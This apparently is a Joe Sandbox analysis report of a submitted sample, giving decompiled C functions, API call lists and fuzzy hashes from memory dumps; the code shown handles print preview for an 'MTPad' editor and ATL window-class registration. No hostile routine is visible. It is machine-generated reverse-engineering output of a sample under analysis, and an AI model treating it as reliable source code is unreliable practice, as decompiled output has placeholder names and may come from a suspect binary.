                                                                                                                                                                                                                                                                                          0x000f42ad
                                                                                                                                                                                                                                                                                          0x000f42b5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f42bb
                                                                                                                                                                                                                                                                                          0x000f42bc
                                                                                                                                                                                                                                                                                          0x000f42c2
                                                                                                                                                                                                                                                                                          0x000f42ca
                                                                                                                                                                                                                                                                                          0x000f42d0
                                                                                                                                                                                                                                                                                          0x000f42d5
                                                                                                                                                                                                                                                                                          0x000f42da
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f42e0
                                                                                                                                                                                                                                                                                          0x000f42e0
                                                                                                                                                                                                                                                                                          0x000f42ec
                                                                                                                                                                                                                                                                                          0x000f4306
                                                                                                                                                                                                                                                                                          0x000f4313
                                                                                                                                                                                                                                                                                          0x000f42ee
                                                                                                                                                                                                                                                                                          0x000f42ef
                                                                                                                                                                                                                                                                                          0x000f42f4
                                                                                                                                                                                                                                                                                          0x000f42f9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f42fb
                                                                                                                                                                                                                                                                                          0x000f42fd
                                                                                                                                                                                                                                                                                          0x000f4302
                                                                                                                                                                                                                                                                                          0x000f4302
                                                                                                                                                                                                                                                                                          0x000f42f9
                                                                                                                                                                                                                                                                                          0x000f4319
                                                                                                                                                                                                                                                                                          0x000f431d
                                                                                                                                                                                                                                                                                          0x000f4322
                                                                                                                                                                                                                                                                                          0x000f4326
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f432c
                                                                                                                                                                                                                                                                                          0x000f4330
                                                                                                                                                                                                                                                                                          0x000f433c
                                                                                                                                                                                                                                                                                          0x000f433d
                                                                                                                                                                                                                                                                                          0x000f433e
                                                                                                                                                                                                                                                                                          0x000f4347
                                                                                                                                                                                                                                                                                          0x000f4340
                                                                                                                                                                                                                                                                                          0x000f4340
                                                                                                                                                                                                                                                                                          0x000f4340
                                                                                                                                                                                                                                                                                          0x000f434c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f434c
                                                                                                                                                                                                                                                                                          0x000f4326
                                                                                                                                                                                                                                                                                          0x000f42da
                                                                                                                                                                                                                                                                                          0x000f42b5
                                                                                                                                                                                                                                                                                          0x000f42a7
                                                                                                                                                                                                                                                                                          0x000f4285
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f41a9
                                                                                                                                                                                                                                                                                          0x000f4114
                                                                                                                                                                                                                                                                                          0x000f4114
                                                                                                                                                                                                                                                                                          0x000f411a
                                                                                                                                                                                                                                                                                          0x000f4125
                                                                                                                                                                                                                                                                                          0x000f412a
                                                                                                                                                                                                                                                                                          0x000f412a
                                                                                                                                                                                                                                                                                          0x000f40f4
                                                                                                                                                                                                                                                                                          0x000f40f9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f40f9
                                                                                                                                                                                                                                                                                          0x000f40f2
                                                                                                                                                                                                                                                                                          0x000f4065
                                                                                                                                                                                                                                                                                          0x000f4065
                                                                                                                                                                                                                                                                                          0x000f406d
                                                                                                                                                                                                                                                                                          0x000f4074
                                                                                                                                                                                                                                                                                          0x000f4074
                                                                                                                                                                                                                                                                                          0x000f4079
                                                                                                                                                                                                                                                                                          0x000f407d
                                                                                                                                                                                                                                                                                          0x000f4359
                                                                                                                                                                                                                                                                                          0x000f435f
                                                                                                                                                                                                                                                                                          0x000f4364
                                                                                                                                                                                                                                                                                          0x000f4083
                                                                                                                                                                                                                                                                                          0x000f4083
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f4083
                                                                                                                                                                                                                                                                                          0x000f407d
                                                                                                                                                                                                                                                                                          0x000f437c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 000F405B
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000F4065
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(000F0000,?,00000104), ref: 000F40EA
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 000F413B
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 000F41E1
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 000F424C
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FA1D0: _malloc.LIBCMT ref: 000FA1DE
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F28F0: lstrlenW.KERNEL32(00000000,1F9A9BDF,?,00000000,?,?,000F434C,00112CF0,?), ref: 000F292E
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F28F0: lstrlenW.KERNEL32(REGISTRY,?,000F434C,00112CF0,?), ref: 000F2999
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00112CF0,Module_Raw,?,00112CF0,Module,?), ref: 000F42BC
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$Module$CountCriticalErrorFileHandleInitializeLastNameSectionSpin_malloc
                                                                                                                                                                                                                                                                                          • String ID: Module$Module_Raw
                                                                                                                                                                                                                                                                                          • API String ID: 2055072790-3885325121
                                                                                                                                                                                                                                                                                          • Opcode ID: e23aa9d62ef8b3854103024361345c4d9c35adc591b82a97de348dcc62008eb9
                                                                                                                                                                                                                                                                                          • Instruction ID: 5fb340b4d88bd2f7078bc855558f204ab103cf671e1671e08e12c56e6809a8cf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e23aa9d62ef8b3854103024361345c4d9c35adc591b82a97de348dcc62008eb9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D916D71A0122D8BEB60DB24CC817FF73B5AF94340F0541A4EA09A7652EB719EC5DF81
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                          			E000F93A0(struct HWND__* __edx, intOrPtr __edi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v28;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                                                                          				intOrPtr _t66;
                                                                                                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                                                                                          				intOrPtr _t86;
                                                                                                                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t84 = __edi;
                                                                                                                                                                                                                                                                                          				_t78 = __edx;
                                                                                                                                                                                                                                                                                          				_t36 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t36 ^ _t91;
                                                                                                                                                                                                                                                                                          				if(E000F8E40(__edx, __edi) != 0) {
                                                                                                                                                                                                                                                                                          					__eflags = __edi;
                                                                                                                                                                                                                                                                                          					if(__edi == 0) {
                                                                                                                                                                                                                                                                                          						_t86 = 0;
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t86 = __edi + 0x34;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t39 =  *((intOrPtr*)(_t84 + 0x530));
                                                                                                                                                                                                                                                                                          					_t66 =  *((intOrPtr*)(_t84 + 0x4b8));
                                                                                                                                                                                                                                                                                          					_t79 =  *((intOrPtr*)(_t84 + 0x4c0));
                                                                                                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(_t84 + 0x4ec));
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t84 + 0x4ec)) != 0) {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t84 + 0x4ec)) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4ec)) = _t66;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4e8)) = _t86;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4f4)) = _t79;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x504)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x4f8)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x508)) = 0;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t84 + 0x50c)) = _t39 - 1;
                                                                                                                                                                                                                                                                                          					E000F66C0(0, _t84 + 0x4e8);
                                                                                                                                                                                                                                                                                          					GetClientRect( *(_t84 + 4),  &_v24);
                                                                                                                                                                                                                                                                                          					_v28 =  *(_t84 + 4);
                                                                                                                                                                                                                                                                                          					__eflags =  *0x15add0; // 0x0
                                                                                                                                                                                                                                                                                          					if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          						 *0x15add0 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					E00103ED0(_t84 + 0x4c4, E00103FF0(0x15ada0, 0x170c04, _t84 + 0x4e4) & 0x0000ffff, _v28,  &_v24, 0, 0x56000000, 0, 0);
                                                                                                                                                                                                                                                                                          					ShowWindow( *(_t84 + 0x4c8), 5);
                                                                                                                                                                                                                                                                                          					SetWindowPos( *(_t84 + 0x4c8), 0, 0, 0, 0, 0, 0x43);
                                                                                                                                                                                                                                                                                          					ShowWindow( *(_t84 + 0x2c), 0);
                                                                                                                                                                                                                                                                                          					 *(_t84 + 0x524) =  *(_t84 + 0x2c);
                                                                                                                                                                                                                                                                                          					 *(_t84 + 0x2c) =  *(_t84 + 0x4c8);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t84 + 0x24), 0x423, 1, 0);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t84 + 0x24), 0x423, 2, 1);
                                                                                                                                                                                                                                                                                          					E000FA7D0(E00103FF0(0x15ada0, 0x170c04, _t84 + 0x4e4) & 0x0000ffff, _t84, __eflags, 1);
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					return E001059E6(0, E00103FF0(0x15ada0, 0x170c04, _t84 + 0x4e4) & 0x0000ffff, _v8 ^ _t91,  *(_t84 + 0x4c8), _t84, SendMessageA);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					MessageBoxA( *(__edi + 4), "Print preview operation failed", "MTPad", 0x10);
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t62, _v8 ^ _t91, _t78, __edi, _t85);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x000f93a0
                                                                                                                                                                                                                                                                                          0x000f93a0
                                                                                                                                                                                                                                                                                          0x000f93a6
                                                                                                                                                                                                                                                                                          0x000f93ad
                                                                                                                                                                                                                                                                                          0x000f93ba
                                                                                                                                                                                                                                                                                          0x000f93e6
                                                                                                                                                                                                                                                                                          0x000f93e8
                                                                                                                                                                                                                                                                                          0x000f93ef
                                                                                                                                                                                                                                                                                          0x000f93ef
                                                                                                                                                                                                                                                                                          0x000f93ea
                                                                                                                                                                                                                                                                                          0x000f93ea
                                                                                                                                                                                                                                                                                          0x000f93ea
                                                                                                                                                                                                                                                                                          0x000f93f1
                                                                                                                                                                                                                                                                                          0x000f93f7
                                                                                                                                                                                                                                                                                          0x000f93fd
                                                                                                                                                                                                                                                                                          0x000f9403
                                                                                                                                                                                                                                                                                          0x000f9409
                                                                                                                                                                                                                                                                                          0x000f940b
                                                                                                                                                                                                                                                                                          0x000f940b
                                                                                                                                                                                                                                                                                          0x000f9411
                                                                                                                                                                                                                                                                                          0x000f9417
                                                                                                                                                                                                                                                                                          0x000f941d
                                                                                                                                                                                                                                                                                          0x000f9423
                                                                                                                                                                                                                                                                                          0x000f9429
                                                                                                                                                                                                                                                                                          0x000f9438
                                                                                                                                                                                                                                                                                          0x000f943e
                                                                                                                                                                                                                                                                                          0x000f9444
                                                                                                                                                                                                                                                                                          0x000f9451
                                                                                                                                                                                                                                                                                          0x000f945c
                                                                                                                                                                                                                                                                                          0x000f945f
                                                                                                                                                                                                                                                                                          0x000f9465
                                                                                                                                                                                                                                                                                          0x000f9467
                                                                                                                                                                                                                                                                                          0x000f9467
                                                                                                                                                                                                                                                                                          0x000f94a1
                                                                                                                                                                                                                                                                                          0x000f94b5
                                                                                                                                                                                                                                                                                          0x000f94ca
                                                                                                                                                                                                                                                                                          0x000f94d6
                                                                                                                                                                                                                                                                                          0x000f94f4
                                                                                                                                                                                                                                                                                          0x000f94fa
                                                                                                                                                                                                                                                                                          0x000f94fd
                                                                                                                                                                                                                                                                                          0x000f950c
                                                                                                                                                                                                                                                                                          0x000f9512
                                                                                                                                                                                                                                                                                          0x000f951d
                                                                                                                                                                                                                                                                                          0x000f9528
                                                                                                                                                                                                                                                                                          0x000f93bc
                                                                                                                                                                                                                                                                                          0x000f93cc
                                                                                                                                                                                                                                                                                          0x000f93e3
                                                                                                                                                                                                                                                                                          0x000f93e3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 000F93CC
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 000F9451
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005,?,?,00000000,56000000,00000000,00000000,?,?), ref: 000F94B5
                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000043,?,?), ref: 000F94CA
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?), ref: 000F94D6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000423,00000001,00000000), ref: 000F94FD
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000423,00000002,00000001), ref: 000F950C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageWindow$SendShow$ClientRect
                                                                                                                                                                                                                                                                                          • String ID: MTPad$Print preview operation failed
                                                                                                                                                                                                                                                                                          • API String ID: 3447962482-1460434131
                                                                                                                                                                                                                                                                                          • Opcode ID: 1ee0edf760b5823964e2fbf4a8eb6fdb061ce5a39111f3e8988208c92496a0ee
                                                                                                                                                                                                                                                                                          • Instruction ID: 3a212d54cb689b8dfcf785fce241049eebfa008778a4bbaa6751e2561bad8b20
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ee0edf760b5823964e2fbf4a8eb6fdb061ce5a39111f3e8988208c92496a0ee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B4190B1B0060AABC718DF64DD81FAAF7A8FB48301F00421AF61997680DBB0B950CFD4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00103FF0(void* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                          				wchar_t* _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _v20;
                                                                                                                                                                                                                                                                                          				struct _WNDCLASSEXA _v68;
                                                                                                                                                                                                                                                                                          				struct _WNDCLASSEXA _v116;
                                                                                                                                                                                                                                                                                          				CHAR* _t53;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t55;
                                                                                                                                                                                                                                                                                          				CHAR* _t58;
                                                                                                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                                          				wchar_t* _t96;
                                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t69 = __ebx;
                                                                                                                                                                                                                                                                                          				if(__ebx == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *((short*)(__ebx + 0x40)) != 0) {
                                                                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                                                                          						if( *(_t69 + 0x30) != 0) {
                                                                                                                                                                                                                                                                                          							_t47 = _t69 + 0x34; // 0x0
                                                                                                                                                                                                                                                                                          							 *_a8 =  *_t47;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t49 = _t69 + 0x40; // 0x0
                                                                                                                                                                                                                                                                                          						return  *_t49;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v20 = 0x170c68;
                                                                                                                                                                                                                                                                                          						EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          						_v16 = 1;
                                                                                                                                                                                                                                                                                          						if( *((short*)(__ebx + 0x40)) != 0) {
                                                                                                                                                                                                                                                                                          							L18:
                                                                                                                                                                                                                                                                                          							LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          							goto L19;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t6 = _t69 + 0x30; // 0x0
                                                                                                                                                                                                                                                                                          							_t53 =  *_t6;
                                                                                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(__ebx + 0x3c)) == 0) {
                                                                                                                                                                                                                                                                                          									_t55 =  *(_a4 + 8);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t55 = 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t29 = _t69 + 0x38; // 0x7f00
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_t69 + 0x1c)) = LoadCursorA(_t55,  *_t29);
                                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t7 = _t69 + 0x28; // 0x112608
                                                                                                                                                                                                                                                                                          								_t8 = _t69 + 8; // 0x104140
                                                                                                                                                                                                                                                                                          								_v8 =  *_t7;
                                                                                                                                                                                                                                                                                          								_v12 =  *_t8;
                                                                                                                                                                                                                                                                                          								_v68.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          								if(GetClassInfoExA(0, _t53,  &_v68) != 0) {
                                                                                                                                                                                                                                                                                          									L9:
                                                                                                                                                                                                                                                                                          									memcpy(_t69,  &_v68, 0xc << 2);
                                                                                                                                                                                                                                                                                          									_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                                                          									_t21 = _t69 + 8; // 0x104140
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t69 + 0x34)) =  *_t21;
                                                                                                                                                                                                                                                                                          									 *(_t69 + 0x28) = _v8;
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t69 + 8)) = _v12;
                                                                                                                                                                                                                                                                                          									L14:
                                                                                                                                                                                                                                                                                          									 *(_t69 + 4) =  *(_t69 + 4) & 0xffffbfff;
                                                                                                                                                                                                                                                                                          									 *(_t69 + 0x14) =  *(_a4 + 4);
                                                                                                                                                                                                                                                                                          									if( *(_t69 + 0x28) == 0) {
                                                                                                                                                                                                                                                                                          										_t37 = _t69 + 0x42; // 0x15ade2
                                                                                                                                                                                                                                                                                          										_t96 = _t37;
                                                                                                                                                                                                                                                                                          										swprintf(_t96, 0x25, "ATL:%p", _t69);
                                                                                                                                                                                                                                                                                          										_t99 = _t99 + 0x10;
                                                                                                                                                                                                                                                                                          										 *(_t69 + 0x28) = _t96;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t58 = memcpy( &_v116, _t69, 0xc << 2);
                                                                                                                                                                                                                                                                                          									_t43 = _t69 + 0x14; // 0x0
                                                                                                                                                                                                                                                                                          									_t75 =  *_t43;
                                                                                                                                                                                                                                                                                          									_t59 = GetClassInfoExA( *_t43, _t58,  &_v116);
                                                                                                                                                                                                                                                                                          									 *(_t69 + 0x40) = _t59;
                                                                                                                                                                                                                                                                                          									if(_t59 == 0) {
                                                                                                                                                                                                                                                                                          										 *(_t69 + 0x40) = E000F4E50(_t69, _t75);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t15 = _t69 + 0x30; // 0x0
                                                                                                                                                                                                                                                                                          									if(GetClassInfoExA( *(_a4 + 4),  *_t15,  &_v68) != 0) {
                                                                                                                                                                                                                                                                                          										goto L9;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										E00103D20( &_v20);
                                                                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x00103ff0
                                                                                                                                                                                                                                                                                          0x00103ffa
                                                                                                                                                                                                                                                                                          0x00104078
                                                                                                                                                                                                                                                                                          0x0010407f
                                                                                                                                                                                                                                                                                          0x00104002
                                                                                                                                                                                                                                                                                          0x00104007
                                                                                                                                                                                                                                                                                          0x00104128
                                                                                                                                                                                                                                                                                          0x0010412c
                                                                                                                                                                                                                                                                                          0x0010412e
                                                                                                                                                                                                                                                                                          0x00104134
                                                                                                                                                                                                                                                                                          0x00104134
                                                                                                                                                                                                                                                                                          0x00104136
                                                                                                                                                                                                                                                                                          0x0010413f
                                                                                                                                                                                                                                                                                          0x0010400d
                                                                                                                                                                                                                                                                                          0x00104012
                                                                                                                                                                                                                                                                                          0x00104019
                                                                                                                                                                                                                                                                                          0x00104024
                                                                                                                                                                                                                                                                                          0x00104028
                                                                                                                                                                                                                                                                                          0x0010411d
                                                                                                                                                                                                                                                                                          0x00104122
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010402e
                                                                                                                                                                                                                                                                                          0x0010402e
                                                                                                                                                                                                                                                                                          0x0010402e
                                                                                                                                                                                                                                                                                          0x00104033
                                                                                                                                                                                                                                                                                          0x001040a4
                                                                                                                                                                                                                                                                                          0x001040ad
                                                                                                                                                                                                                                                                                          0x001040a6
                                                                                                                                                                                                                                                                                          0x001040a6
                                                                                                                                                                                                                                                                                          0x001040a6
                                                                                                                                                                                                                                                                                          0x001040b0
                                                                                                                                                                                                                                                                                          0x001040bb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104035
                                                                                                                                                                                                                                                                                          0x00104035
                                                                                                                                                                                                                                                                                          0x00104038
                                                                                                                                                                                                                                                                                          0x00104041
                                                                                                                                                                                                                                                                                          0x0010404b
                                                                                                                                                                                                                                                                                          0x0010404e
                                                                                                                                                                                                                                                                                          0x00104059
                                                                                                                                                                                                                                                                                          0x00104080
                                                                                                                                                                                                                                                                                          0x0010408d
                                                                                                                                                                                                                                                                                          0x0010408d
                                                                                                                                                                                                                                                                                          0x0010408f
                                                                                                                                                                                                                                                                                          0x00104095
                                                                                                                                                                                                                                                                                          0x00104098
                                                                                                                                                                                                                                                                                          0x0010409b
                                                                                                                                                                                                                                                                                          0x001040be
                                                                                                                                                                                                                                                                                          0x001040c4
                                                                                                                                                                                                                                                                                          0x001040cf
                                                                                                                                                                                                                                                                                          0x001040d2
                                                                                                                                                                                                                                                                                          0x001040da
                                                                                                                                                                                                                                                                                          0x001040da
                                                                                                                                                                                                                                                                                          0x001040e0
                                                                                                                                                                                                                                                                                          0x001040e5
                                                                                                                                                                                                                                                                                          0x001040e8
                                                                                                                                                                                                                                                                                          0x001040e8
                                                                                                                                                                                                                                                                                          0x001040fc
                                                                                                                                                                                                                                                                                          0x001040fe
                                                                                                                                                                                                                                                                                          0x001040fe
                                                                                                                                                                                                                                                                                          0x00104103
                                                                                                                                                                                                                                                                                          0x00104109
                                                                                                                                                                                                                                                                                          0x00104110
                                                                                                                                                                                                                                                                                          0x00104119
                                                                                                                                                                                                                                                                                          0x00104119
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010405b
                                                                                                                                                                                                                                                                                          0x00104061
                                                                                                                                                                                                                                                                                          0x0010406e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104070
                                                                                                                                                                                                                                                                                          0x00104073
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00104073
                                                                                                                                                                                                                                                                                          0x0010406e
                                                                                                                                                                                                                                                                                          0x00104059
                                                                                                                                                                                                                                                                                          0x00104033
                                                                                                                                                                                                                                                                                          0x00104028
                                                                                                                                                                                                                                                                                          0x00104007

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,00000000), ref: 00104019
                                                                                                                                                                                                                                                                                          • GetClassInfoExA.USER32(00000000,00000000,?), ref: 00104055
                                                                                                                                                                                                                                                                                          • GetClassInfoExA.USER32(?,00000000,00000030), ref: 0010406A
                                                                                                                                                                                                                                                                                            • Part of subcall function 00103D20: LeaveCriticalSection.KERNEL32(00000000,74914ED0,00104078,?,00000000), ref: 00103D2C
                                                                                                                                                                                                                                                                                          • LoadCursorA.USER32 ref: 001040B5
                                                                                                                                                                                                                                                                                          • swprintf.LIBCMT ref: 001040E0
                                                                                                                                                                                                                                                                                          • GetClassInfoExA.USER32(00000000,00112608,?), ref: 00104103
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68,?,00000000), ref: 00104122
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
